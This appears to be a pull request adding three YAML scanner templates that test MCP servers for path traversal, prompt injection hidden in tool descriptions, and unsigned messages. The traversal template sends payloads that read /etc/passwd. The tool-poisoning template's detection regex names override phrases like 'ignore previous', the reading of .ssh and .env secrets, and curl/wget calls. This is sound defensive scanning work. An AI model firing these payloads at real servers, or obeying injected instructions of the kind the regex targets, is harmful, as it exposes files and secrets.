### PR TITLE
Add MCP/AI Agent Security Templates

### DIFF
--- a/http/misconfiguration/mcp/mcp-path-traversal.yaml
+++ b/http/misconfiguration/mcp/mcp-path-traversal.yaml
@@ -1,0 +1,52 @@
+id: mcp-path-traversal
+
+info:
+  name: MCP Resource Path Traversal
+  author: razashariff
+  severity: high
+  description: |
+    MCP server resource endpoints are vulnerable to path traversal attacks
+    allowing access to files outside the intended resource directory.
+  reference:
+    - https://cheatsheetseries.owasp.org/cheatsheets/MCP_Security_Cheat_Sheet.html
+  classification:
+    cwe-id: CWE-22
+    cvss-score: 7.5
+  tags: mcp,ai-agent,path-traversal,owasp
+  metadata:
+    max-request: 3
+    owasp-mcp: MCP-005
+
+http:
+  - raw:
+      - |
+        POST {{BaseURL}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"jsonrpc":"2.0","method":"resources/read","params":{"uri":"file://../../etc/passwd"},"id":1}
+
+      - |
+        POST {{BaseURL}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"jsonrpc":"2.0","method":"resources/read","params":{"uri":"file://..%2f..%2fetc%2fpasswd"},"id":2}
+
+      - |
+        POST {{BaseURL}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"jsonrpc":"2.0","method":"resources/read","params":{"uri":"file://....//....//etc/passwd"},"id":3}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        regex:
+          - 'root:.*:0:0'
+        part: body

--- a/http/misconfiguration/mcp/mcp-tool-poisoning.yaml
+++ b/http/misconfiguration/mcp/mcp-tool-poisoning.yaml
@@ -1,0 +1,40 @@
+id: mcp-tool-poisoning
+
+info:
+  name: MCP Tool Description Contains Prompt Injection
+  author: razashariff
+  severity: critical
+  description: |
+    MCP tool descriptions contain hidden instructions that could cause
+    an AI agent to perform unintended actions such as data exfiltration
+    or unauthorized file access.
+  reference:
+    - https://cheatsheetseries.owasp.org/cheatsheets/MCP_Security_Cheat_Sheet.html
+    - https://datatracker.ietf.org/doc/draft-sharif-mcps-secure-mcp/
+  classification:
+    cwe-id: CWE-94
+    cvss-score: 9.1
+  tags: mcp,ai-agent,prompt-injection,owasp
+  metadata:
+    max-request: 1
+    owasp-mcp: MCP-001
+
+http:
+  - raw:
+      - |
+        POST {{BaseURL}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"jsonrpc":"2.0","method":"tools/list","id":1}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        regex:
+          - '(?i)(ignore previous|system prompt|IMPORTANT:|read.*\.ssh|read.*\.env|include.*api.key|include.*password|execute.*command|curl.*http|wget.*http)'
+        part: body

--- a/http/misconfiguration/mcp/mcp-unsigned-communication.yaml
+++ b/http/misconfiguration/mcp/mcp-unsigned-communication.yaml
@@ -1,0 +1,46 @@
+id: mcp-unsigned-communication
+
+info:
+  name: MCP Server Accepts Unsigned Messages
+  author: razashariff
+  severity: high
+  description: |
+    The MCP server accepts unsigned JSON-RPC messages without requiring
+    cryptographic signatures. This allows man-in-the-middle modification
+    of tool calls and responses after TLS termination.
+  reference:
+    - https://cheatsheetseries.owasp.org/cheatsheets/MCP_Security_Cheat_Sheet.html
+    - https://datatracker.ietf.org/doc/draft-sharif-mcps-secure-mcp/
+  classification:
+    cwe-id: CWE-345
+    cvss-score: 7.5
+  tags: mcp,ai-agent,security,owasp
+  metadata:
+    max-request: 1
+    owasp-mcp: MCP-002
+
+http:
+  - raw:
+      - |
+        POST {{BaseURL}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"jsonrpc":"2.0","method":"tools/list","id":1}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "jsonrpc"
+          - "result"
+        condition: and
+
+    extractors:
+      - type: json
+        json:
+          - '.result.tools | length'


### PR DESCRIPTION
Three new templates for AI agent and MCP security testing:

- **mcp-tool-poisoning** (Critical) -- Detects prompt injection in MCP tool descriptions
- **mcp-unsigned-communication** (High) -- Tests if MCP server accepts unsigned messages
- **mcp-path-traversal** (High) -- Tests MCP resource endpoints for path traversal

References:
- [OWASP MCP Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/MCP_Security_Cheat_Sheet.html) Section 7
- [IETF draft-sharif-mcps-secure-mcp](https://datatracker.ietf.org/doc/draft-sharif-mcps-secure-mcp/)
- MITRE ATLAS technique proposals submitted for Agent Identity Spoofing and Agent Payment Hijacking